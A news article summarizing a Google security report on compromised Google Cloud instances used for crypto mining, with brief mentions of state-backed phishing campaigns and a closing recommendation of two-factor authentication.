• According to a Google security report, compromised cloud instances were used for crypto mining

  • Regular mining and mining for cryptocurrencies are not the same thing, but they do share some characteristics. Illegal mining of both has a negative impact on the environment, economy, public order, and governance. Online attacks have grown in popularity, and they include cryptocurrency mining abuse, phishing campaigns, ransomware, and other threats.

    Consider this: a new Google cyber security report has revealed some troubling statistics. The most compromised Google Cloud accounts, according to this report, are used for cryptocurrency mining.

    The first issue of Threat Horizons insights was published by Google’s Cybersecurity Action Team. The Threat Analysis Group (TAG), Google Cloud Threat Intelligence for Chronicle, Trust and Safety, and other internal teams provided threat intelligence observations for the report.

    According to the report:

    “Of 50 recently compromised GCP instances, 86% of the compromised Google Cloud instances were used to perform cryptocurrency mining, a cloud resource-intensive for-profit activity, which typically consumed CPU/GPU resources, or in cases of Chia mining, storage space.”

    Google Cloud is being used for illegal cryptocurrency mining.

    It went on to say that 10% of the compromised accounts were used to conduct scans of other publicly accessible internet resources in order to identify vulnerable systems. In addition, another 8% of the hacked accounts were used to attack other targets.

    It also sheds light on possible explanations. For example, actors gaining access to the Internet-facing Cloud instance were responsible for 48% of compromised instances. For user accounts or API connections, these either had no password or a weak password.

    The aforementioned malicious activities are not novel. In fact, phishing campaigns and ransomware are becoming more common on the cloud platform.

    “Attackers also continue to exploit poorly configured Cloud instances to obtain profit through cryptocurrency mining and traffic pumping. The universe of ransomware also continues to expand with the discovery of some new ransomware that appears to be offshoots of existing malware with mixed capabilities.”

    Moving on, time is also a factor in the compromise of Google Cloud instances. It was determined that the shortest time between deploying a vulnerable Cloud instance exposed to the Internet and its compromise was as little as 30 minutes. Furthermore, 58% of cryptocurrency mining software breaches occurred within 22 seconds of the account being compromised. This narrative is illuminated by the chart below.

    What does this mean? According to the aforementioned timeline, the initial attacks and subsequent downloads were pre-planned events. There was no need for human intervention. According to the report, “it is nearly impossible to intervene manually in these situations to prevent exploitation.” The best defense would be to avoid using vulnerable systems or having automated response mechanisms.”

    The Russian link

    In a mass phishing attempt, the Russian government-backed hacking group APT28, also known as Fancy Bear, targeted approximately 12,000 Gmail accounts. In a manner similar to the previously mentioned tasks, these fraudsters would entice victims to change their credentials on the attacker’s controlled phishing page.

    Another hack involved a North Korean-backed hacker group posing as recruiters at Samsung and sending fake job opportunities to employees of South Korean information security firms.

    In addition, a recent report discussed scammers who compromised YouTube videos and earned at least $8.9 million in October alone through bogus cryptocurrency giveaways.

    With such an increase in malicious activities, improving security by incorporating two-factor authentication (2FA) should be a top priority.

    What's your reaction?